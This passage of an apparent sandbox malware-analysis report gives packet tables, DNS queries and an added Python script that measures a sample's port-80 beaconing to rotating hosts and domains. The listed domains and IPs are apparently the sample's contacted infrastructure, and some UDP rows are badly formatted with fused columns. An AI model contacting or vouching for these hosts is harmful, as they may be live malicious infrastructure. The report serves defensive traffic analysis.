Nov 26, 2020 08:25:10.604392052 CET | 49753       | 80        | 192.168.2.7     | 81.88.57.68
Nov 26, 2020 08:25:10.604625940 CET | 49753       | 80        | 192.168.2.7     | 81.88.57.68
Nov 26, 2020 08:25:10.632275105 CET | 80          | 49753     | 81.88.57.68     | 192.168.2.7
Nov 26, 2020 08:25:10.663077116 CET | 80          | 49753     | 81.88.57.68     | 192.168.2.7
Nov 26, 2020 08:25:10.663239956 CET | 80          | 49753     | 81.88.57.68     | 192.168.2.7
Nov 26, 2020 08:25:10.663312912 CET | 49753       | 80        | 192.168.2.7     | 81.88.57.68
Nov 26, 2020 08:25:10.663395882 CET | 49753       | 80        | 192.168.2.7     | 81.88.57.68
Nov 26, 2020 08:25:10.691390991 CET | 80          | 49753     | 81.88.57.68     | 192.168.2.7
Nov 26, 2020 08:25:30.892530918 CET | 49756       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:25:30.908998966 CET | 80          | 49756     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:25:30.909189939 CET | 49756       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:25:30.909708023 CET | 49756       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:25:30.926142931 CET | 80          | 49756     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:25:31.024852037 CET | 80          | 49756     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:25:31.024892092 CET | 80          | 49756     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:25:31.025085926 CET | 49756       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:25:31.025147915 CET | 49756       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:25:31.045023918 CET | 80          | 49756     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:25:51.245682001 CET | 49758       | 80        | 192.168.2.7     | 173.192.101.248
Nov 26, 2020 08:25:51.383419991 CET | 80          | 49758     | 173.192.101.248 | 192.168.2.7
Nov 26, 2020 08:25:51.383630991 CET | 49758       | 80        | 192.168.2.7     | 173.192.101.248
Nov 26, 2020 08:25:51.383757114 CET | 49758       | 80        | 192.168.2.7     | 173.192.101.248
Nov 26, 2020 08:25:51.521249056 CET | 80          | 49758     | 173.192.101.248 | 192.168.2.7
Nov 26, 2020 08:25:51.522063017 CET | 80          | 49758     | 173.192.101.248 | 192.168.2.7
Nov 26, 2020 08:25:51.522284031 CET | 49758       | 80        | 192.168.2.7     | 173.192.101.248
Nov 26, 2020 08:25:51.522330046 CET | 49758       | 80        | 192.168.2.7     | 173.192.101.248
Nov 26, 2020 08:25:51.662019968 CET | 80          | 49758     | 173.192.101.248 | 192.168.2.7
Nov 26, 2020 08:26:13.709397078 CET | 49759       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:26:13.726147890 CET | 80          | 49759     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:26:13.726284981 CET | 49759       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:26:13.726460934 CET | 49759       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:26:13.743061066 CET | 80          | 49759     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:26:13.841572046 CET | 80          | 49759     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:26:13.841609955 CET | 80          | 49759     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:26:13.841810942 CET | 49759       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:26:13.841866970 CET | 49759       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:26:13.859590054 CET | 80          | 49759     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:26:34.069722891 CET | 49760       | 80        | 192.168.2.7     | 184.168.131.241
Nov 26, 2020 08:26:34.228195906 CET | 80          | 49760     | 184.168.131.241 | 192.168.2.7
Nov 26, 2020 08:26:34.228389978 CET | 49760       | 80        | 192.168.2.7     | 184.168.131.241
Nov 26, 2020 08:26:34.228813887 CET | 49760       | 80        | 192.168.2.7     | 184.168.131.241
Nov 26, 2020 08:26:34.387171984 CET | 80          | 49760     | 184.168.131.241 | 192.168.2.7
Nov 26, 2020 08:26:34.406599045 CET | 80          | 49760     | 184.168.131.241 | 192.168.2.7
Nov 26, 2020 08:26:34.406629086 CET | 80          | 49760     | 184.168.131.241 | 192.168.2.7
Nov 26, 2020 08:26:34.407097101 CET | 49760       | 80        | 192.168.2.7     | 184.168.131.241
Nov 26, 2020 08:26:34.407377958 CET | 49760       | 80        | 192.168.2.7     | 184.168.131.241
Nov 26, 2020 08:26:34.565639019 CET | 80          | 49760     | 184.168.131.241 | 192.168.2.7
Nov 26, 2020 08:26:54.651011944 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:26:54.667692900 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.667834997 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:26:54.667975903 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:26:54.684561968 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.805349112 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.805397034 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.805416107 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.805432081 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.805444956 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.805550098 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:26:54.805680990 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:26:54.806642056 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.806759119 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.806780100 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:26:54.806833029 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:26:54.822091103 CET | 80          | 49761     | 23.227.38.74    | 192.168.2.7
Nov 26, 2020 08:26:54.822158098 CET | 49761       | 80        | 192.168.2.7     | 23.227.38.74
Nov 26, 2020 08:27:15.052941084 CET | 49762       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:15.069664955 CET | 80          | 49762     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:15.069876909 CET | 49762       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:15.070194006 CET | 49762       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:15.086725950 CET | 80          | 49762     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:15.187453032 CET | 80          | 49762     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:15.187482119 CET | 80          | 49762     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:15.187685966 CET | 49762       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:15.187797070 CET | 49762       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:15.204237938 CET | 80          | 49762     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:58.046732903 CET | 49763       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:58.063263893 CET | 80          | 49763     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:58.063446999 CET | 49763       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:58.063796997 CET | 49763       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:58.080161095 CET | 80          | 49763     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:58.179707050 CET | 80          | 49763     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:58.179724932 CET | 80          | 49763     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:27:58.179946899 CET | 49763       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:58.180073977 CET | 49763       | 80        | 192.168.2.7     | 34.102.136.180
Nov 26, 2020 08:27:58.196449995 CET | 80          | 49763     | 34.102.136.180  | 192.168.2.7
Nov 26, 2020 08:28:18.847153902 CET | 49767       | 80        | 192.168.2.7     | 192.185.199.129
Nov 26, 2020 08:28:18.987795115 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:18.987904072 CET | 49767       | 80        | 192.168.2.7     | 192.185.199.129
Nov 26, 2020 08:28:18.988131046 CET | 49767       | 80        | 192.168.2.7     | 192.185.199.129
Nov 26, 2020 08:28:19.145466089 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201641083 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201673985 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201698065 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201723099 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201745987 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201775074 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201797009 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
Nov 26, 2020 08:28:19.201819897 CET | 80          | 49767     | 192.185.199.129 | 192.168.2.7
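Read as a list of connections rather than packets, the table shows the sample opening a new port-80 connection roughly every 20 seconds, rotating through six hosts and returning to 34.102.136.180 four times in the captured window; the Snort 403 alerts above line up with those returns and with the single connection to 23.227.38.74. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the table's format, keeps the first client-side packet of each (source port, destination) pair as the connection start, and reports per-destination counts and the inter-connection gaps. The embedded rows are copied from the table above with the fused columns separated, trimmed to the first client packet of each connection plus a few server replies; the `192.168.` prefix used to recognise the sandbox client is an assumption about this capture. Which of these hosts is live infrastructure is not something the packet list alone establishes.

```python
# Added example (not Joe Sandbox output): connection-start extraction and beacon
# cadence from a timestamped TCP packet list. Rows are taken from the table
# above with columns separated; only a subset is included.
import re
import statistics
from collections import Counter
from datetime import datetime

PACKETS = """\
Nov 26, 2020 08:25:10.576143026 CET 49753 80 192.168.2.7 81.88.57.68
Nov 26, 2020 08:25:10.604172945 CET 80 49753 81.88.57.68 192.168.2.7
Nov 26, 2020 08:25:10.604392052 CET 49753 80 192.168.2.7 81.88.57.68
Nov 26, 2020 08:25:30.892530918 CET 49756 80 192.168.2.7 34.102.136.180
Nov 26, 2020 08:25:30.908998966 CET 80 49756 34.102.136.180 192.168.2.7
Nov 26, 2020 08:25:51.245682001 CET 49758 80 192.168.2.7 173.192.101.248
Nov 26, 2020 08:26:13.709397078 CET 49759 80 192.168.2.7 34.102.136.180
Nov 26, 2020 08:26:34.069722891 CET 49760 80 192.168.2.7 184.168.131.241
Nov 26, 2020 08:26:54.651011944 CET 49761 80 192.168.2.7 23.227.38.74
Nov 26, 2020 08:27:15.052941084 CET 49762 80 192.168.2.7 34.102.136.180
Nov 26, 2020 08:27:58.046732903 CET 49763 80 192.168.2.7 34.102.136.180
Nov 26, 2020 08:28:18.847153902 CET 49767 80 192.168.2.7 192.185.199.129
"""

# "Nov 26, 2020 08:25:10.576143026 CET <sport> <dport> <src> <dst>"
ROW = re.compile(
    r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) \w+ (\d+) (\d+) (\S+) (\S+)$"
)


def parse_row(line: str):
    """(timestamp, sport, dport, src, dst) for a table row, None otherwise."""
    m = ROW.match(line.strip())
    if not m:
        return None
    # the table carries nanoseconds; datetime holds microseconds, so truncate
    ts = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    ts = ts.replace(microsecond=int(m.group(2)[:6].ljust(6, "0")))
    return ts, int(m.group(3)), int(m.group(4)), m.group(5), m.group(6)


def connection_starts(rows, local_prefix: str = "192.168."):
    """Earliest packet the local host sent on each (sport, dst, dport) tuple.
    Each outbound connection uses a fresh ephemeral source port, so the first
    packet seen for a tuple is its SYN. local_prefix is an assumption about
    the sandbox's client network."""
    starts = {}
    for ts, sport, dport, src, dst in rows:
        if not src.startswith(local_prefix):
            continue                                   # server-side packets are not starts
        key = (sport, dst, dport)
        if key not in starts or ts < starts[key]:
            starts[key] = ts
    return sorted((ts, dst, dport) for (_, dst, dport), ts in starts.items())


def summarize(text: str, local_prefix: str = "192.168.") -> dict:
    """Connection count, per-destination counts and the gaps between successive
    connection starts; a tight median gap is the beaconing signal."""
    rows = [r for r in map(parse_row, text.splitlines()) if r]
    starts = connection_starts(rows, local_prefix)
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(starts, starts[1:])]
    return {
        "connections": len(starts),
        "per_destination": dict(Counter(f"{dst}:{dport}" for _, dst, dport in starts)),
        "median_gap_s": statistics.median(gaps) if gaps else None,
        "max_gap_s": max(gaps) if gaps else None,
    }


if __name__ == "__main__":
    summary = summarize(PACKETS)
    print(f"{summary['connections']} connections, median gap {summary['median_gap_s']:.1f}s, "
          f"longest gap {summary['max_gap_s']:.1f}s")
    for dest, n in sorted(summary["per_destination"].items(), key=lambda kv: -kv[1]):
        print(f"  {dest:<22} {n}")
```

Run against the full table the same functions give the complete rotation; the one gap of about 43 seconds between the 08:27:15 and 08:27:58 connections is visible as the maximum and is worth checking against the UDP table below for a lookup that went unanswered in between.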

UDP Packets

Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Nov 26, 2020 08:23:27.554241896 CET | 58717       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:27.581353903 CET | 53          | 58717     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:28.356235027 CET | 59762       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:28.383367062 CET | 53          | 59762     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:29.602894068 CET | 54329       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:29.629887104 CET | 53          | 54329     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:30.947886944 CET | 58052       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:30.983609915 CET | 53          | 58052     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:32.163333893 CET | 54008       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:32.190488100 CET | 53          | 54008     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:35.427184105 CET | 59451       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:35.462594986 CET | 53          | 59451     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:37.087611914 CET | 52914       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:37.114734888 CET | 53          | 52914     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:41.337279081 CET | 64569       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:41.364396095 CET | 53          | 64569     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:41.814739943 CET | 52816       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:41.852030993 CET | 53          | 52816     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:42.487242937 CET | 50781       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:42.514605045 CET | 53          | 50781     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:44.710427999 CET | 54230       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:44.746073961 CET | 53          | 54230     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:46.354592085 CET | 54911       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:46.381702900 CET | 53          | 54911     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:47.445399046 CET | 49958       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:47.472457886 CET | 53          | 49958     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:23:51.516796112 CET | 50860       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:23:51.543814898 CET | 53          | 50860     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:04.348959923 CET | 50452       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:04.376044035 CET | 53          | 50452     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:11.580998898 CET | 59730       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:11.608246088 CET | 53          | 59730     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:11.662111044 CET | 59310       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:11.689261913 CET | 53          | 59310     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:12.716792107 CET | 51919       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:12.752634048 CET | 53          | 51919     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:13.202066898 CET | 64296       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:13.229054928 CET | 53          | 64296     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:14.817929029 CET | 56680       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:14.893677950 CET | 53          | 56680     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:15.334527969 CET | 58820       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:15.370064020 CET | 53          | 58820     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:15.749295950 CET | 60983       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:15.776453018 CET | 53          | 60983     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:15.803134918 CET | 49247       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:15.839884043 CET | 53          | 49247     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:16.179991961 CET | 52286       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:16.215588093 CET | 53          | 52286     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:16.639933109 CET | 56064       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:16.675717115 CET | 53          | 56064     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:16.757443905 CET | 63744       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:16.810400009 CET | 53          | 63744     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:17.096779108 CET | 61457       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:17.132095098 CET | 53          | 61457     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:17.575660944 CET | 58367       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:17.611247063 CET | 53          | 58367     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:18.185626030 CET | 60599       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:18.221262932 CET | 53          | 60599     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:18.995343924 CET | 59571       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:19.022443056 CET | 53          | 59571     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:19.259310961 CET | 52689       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:19.294940948 CET | 53          | 52689     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:19.406106949 CET | 50290       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:19.451456070 CET | 53          | 50290     | 8.8.8.8     | 192.168.2.7
Nov 26, 2020 08:24:19.859639883 CET | 60427       | 53        | 192.168.2.7 | 8.8.8.8
Nov 26, 2020 08:24:19.895576000 CET | 53          | 60427     | 8.8.8.8     | 192.168.2.7
                                                                                      Nov 26, 2020 08:24:20.030391932 CET5620953192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:24:20.057521105 CET53562098.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:24:22.981906891 CET5958253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:24:23.018834114 CET53595828.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:24:26.623354912 CET6094953192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:24:26.650414944 CET53609498.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:24:27.914160967 CET5854253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:24:27.993083954 CET53585428.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:24:50.278177977 CET5917953192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:24:50.332254887 CET53591798.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:24:50.657696009 CET6092753192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:24:50.701302052 CET53609278.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:25:10.509020090 CET5785453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:25:10.570861101 CET53578548.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:25:13.664695024 CET6202653192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:25:13.691746950 CET53620268.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:25:30.838236094 CET5945353192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:25:30.890439987 CET53594538.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:25:47.681998014 CET6246853192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:25:47.727782965 CET53624688.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:25:51.190732956 CET5256353192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:25:51.244364023 CET53525638.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:26:13.667608023 CET5472153192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:26:13.707748890 CET53547218.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:26:34.026716948 CET6282653192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:26:34.068280935 CET53628268.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:26:54.596491098 CET6204653192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:26:54.648833990 CET53620468.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:27:14.995831013 CET5122353192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:27:15.050656080 CET53512238.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:27:35.380831003 CET6390853192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:27:35.803332090 CET53639088.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:27:57.994831085 CET4922653192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:27:58.044636965 CET53492268.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:09.290771008 CET6021253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:09.334768057 CET53602128.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:10.262371063 CET5886753192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:10.300389051 CET53588678.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:14.740593910 CET5086453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:14.776267052 CET53508648.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:18.651273966 CET6150453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:18.846000910 CET53615048.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:19.263307095 CET6023153192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:19.298738956 CET53602318.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:19.528012991 CET5009553192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:19.565455914 CET53500958.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:39.517646074 CET5965453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:39.557630062 CET53596548.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:59.875061035 CET5823353192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:59.914695024 CET53582338.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:29:40.602700949 CET5682253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:29:40.649068117 CET53568228.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:01.176217079 CET6257253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:01.252055883 CET53625728.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:16.915971994 CET5717953192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:16.942970991 CET53571798.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:23.442260027 CET5612453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:23.520160913 CET53561248.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:52.955491066 CET6228753192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:52.982451916 CET53622878.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:53.299175978 CET5464453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:53.334853888 CET53546448.8.8.8192.168.2.7

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 26, 2020 08:24:19.406106949 CET | 192.168.2.7 | 8.8.8.8 | 0xb884 | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:24:27.914160967 CET | 192.168.2.7 | 8.8.8.8 | 0x112 | Standard query (0) | www.jacmkt.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:24:50.278177977 CET | 192.168.2.7 | 8.8.8.8 | 0x7a67 | Standard query (0) | www.goodberryjuice.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:25:10.509020090 CET | 192.168.2.7 | 8.8.8.8 | 0x8534 | Standard query (0) | www.azery.site | A (IP address) | IN (0x0001)
Nov 26, 2020 08:25:30.838236094 CET | 192.168.2.7 | 8.8.8.8 | 0x6e3a | Standard query (0) | www.fittcycleacademy.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:25:47.681998014 CET | 192.168.2.7 | 8.8.8.8 | 0xf99e | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:25:51.190732956 CET | 192.168.2.7 | 8.8.8.8 | 0x3797 | Standard query (0) | www.mycapecoralhomevalue.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:26:13.667608023 CET | 192.168.2.7 | 8.8.8.8 | 0x578d | Standard query (0) | www.nextgenmemorabilia.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:26:34.026716948 CET | 192.168.2.7 | 8.8.8.8 | 0x58f9 | Standard query (0) | www.bitcoincandy.xyz | A (IP address) | IN (0x0001)
Nov 26, 2020 08:26:54.596491098 CET | 192.168.2.7 | 8.8.8.8 | 0xfe84 | Standard query (0) | www.nairobi-paris.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:27:14.995831013 CET | 192.168.2.7 | 8.8.8.8 | 0x1588 | Standard query (0) | www.multitask-improvements.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:27:35.380831003 CET | 192.168.2.7 | 8.8.8.8 | 0x2891 | Standard query (0) | www.best20banks.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:27:57.994831085 CET | 192.168.2.7 | 8.8.8.8 | 0xb714 | Standard query (0) | www.affiliateclubindia.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:28:18.651273966 CET | 192.168.2.7 | 8.8.8.8 | 0xc3c | Standard query (0) | www.chartershome.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:28:39.517646074 CET | 192.168.2.7 | 8.8.8.8 | 0xd0dc | Standard query (0) | www.nationshiphop.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:28:59.875061035 CET | 192.168.2.7 | 8.8.8.8 | 0xbd43 | Standard query (0) | www.cfmfair.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:29:40.602700949 CET | 192.168.2.7 | 8.8.8.8 | 0xbf1c | Standard query (0) | www.skinnerttc.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:30:01.176217079 CET | 192.168.2.7 | 8.8.8.8 | 0x605d | Standard query (0) | www.jacmkt.com | A (IP address) | IN (0x0001)
Nov 26, 2020 08:30:23.442260027 CET | 192.168.2.7 | 8.8.8.8 | 0xf5bc | Standard query (0) | www.goodberryjuice.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
